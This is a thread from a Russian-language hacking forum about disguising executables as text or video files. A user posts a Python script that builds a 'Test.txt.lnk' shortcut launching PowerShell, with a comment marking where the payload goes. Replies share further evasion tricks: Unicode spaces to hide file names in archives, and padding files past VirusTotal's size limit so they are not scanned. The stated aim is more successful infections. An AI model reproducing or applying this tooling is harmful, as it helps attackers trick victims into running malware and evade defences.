• XSS.stack #1 – первый литературный журнал от юзеров форума

Видео Маскируем .exe в txt документ или mp4 медиа

Отслеживать

dunkel

(L1) cache
Пользователь
Регистрация
29.06.2023
Сообщения
921
Реакции
1 102
Гарант сделки
1
Депозит
0.012 Ł

Народная open source альтернатива (с вас 5000 EUR):
Python: 
#pip install pywin32 winshell
import os
import winshell
from win32com.client import Dispatch

# Определяем путь к .lnk файлу
desktop = winshell.desktop()
path = os.path.join(desktop, "Test.txt.lnk")

# Создаем ссылку на Shell объект
shell = Dispatch('WScript.Shell')

# Создаем ярлык
shortcut = shell.CreateShortCut(path)
shortcut.TargetPath = "powershell.exe"
shortcut.Arguments = "-Command \"ping -r google.com\"" #Здесь powershell payload например
shortcut.WorkingDirectory = os.getenv("USERPROFILE")
shortcut.IconLocation = "powershell.exe, 0" #Иконку можете сменить на любую здесь или через ResourceHacker
shortcut.save()

Маскируем .exe в txt документ или медиа.mp4

Посмотреть и скачать с Яндекс Диска
disk.yandex.ru disk.yandex.ru
 
Последнее редактирование:
можно просто иконку сменить)))
 
Voruem сказал(а):
можно просто иконку сменить)))
Смотреть на расширение файла это базовый навык и это делают все, тем более кто работает с доками в корпах и офисах, их этому учат.
А спуфнуть расширение занимает минуту и повышает конверсию отстуков
 
m00r сказал(а):
https://xss.pro/threads/67100/

продажник тут находится
продавец забанен хз за что
Ой я не знал, ну он не продается уже, кряк в видео просто для примера, автоматизирует эту технику
Можно самому в ручную сделать или скрипт накидать, кому интересно почитать как это работает https://www.zscaler.com/blogs/security-research/agent-tesla-rat-delivered-quantum-builder-new-ttps
 
dunkel сказал(а):
Смотреть на расширение файла это базовый навык и это делают все, тем более кто работает с доками в корпах и офисах, их этому учат
а ещё бы я добавил :
1 - ЯРЛЫК у файла .
2 - МЕССЕДЖ при наведении мышки указывающий на повершелл 😆 😆 😆
3 - ни разу не палево )

zzzz.jpg
 
Bard сказал(а):
а ещё бы я добавил :
1 - ЯРЛЫК у файла .
2 - МЕССЕДЖ при наведении мышки указывающий на повершелл 😆 😆 😆
3 - ни разу не палево )

Посмотреть вложение 90567
Ну если 0day найду в блокноте или медиа плеере, сразу об этом топик создам, а пока так двигаемся.
 
dunkel сказал(а):
Ну если 0day найду в блокноте или медиа плеере, сразу об этом топик создам, а пока так двигаемся.
0 dey блокнота не может быть
 
Добавлю в тему U+205F так как способ и сейчас работает в архиве, копируем тыц ;)

2024-07-28_143540.png


Жертва как правило видит всего три точки сама тема тут тыц ;)
 
Adderall сказал(а):
dokazhi obratnoe dam 100 $

ÐбнаÑÑжена RCE-ÑÑзвимоÑÑÑ Ð² пÑиложении ÐÐ»Ð¾ÐºÐ½Ð¾Ñ Windows

ÐÑÑледоваÑÐµÐ»Ñ Ð² облаÑÑи безопаÑноÑÑи ТÑÐ²Ð¸Ñ ÐÑманди, ÑабоÑаÑÑий Ñ Ð¿ÑоекÑом Google Project Zero, обнаÑÑжил ÑÑзвимоÑÑÑ Ð² ÑекÑÑовом ÑедакÑоÑе «ÐлокноÑ» Ð¾Ñ Microsoft. Ðо Ñловам ÑкÑпеÑÑа, ÑÑа пÑоблема...
habr.com

$100 сюда: 1dprEpsBVpjXfiaBtwyFp5X7Dtfs5VVR1
 
jazet сказал(а):
в архиве можно спуфнуть название и тд через hex редактор;)
Покажи нам или сам знаешь, кто сказал и не сделал ;)
 
jazet сказал(а):
я просто слышал что размер вроде можно изменить
Размер увеличивается пампом, а не в hex редакторе
Если памп однотипными повторяющимися данными с низкой энтропией, алгоритм сжимает их до пары байт, и файл 1мб распампленный до 700мб (лимит загрузки на VT 650мбайт) будет весить в допустим запароленном архиве 1мб
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Добавлю в тему U+205F
Можно кстати название файла и название папки без имени сделать alt+0160
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх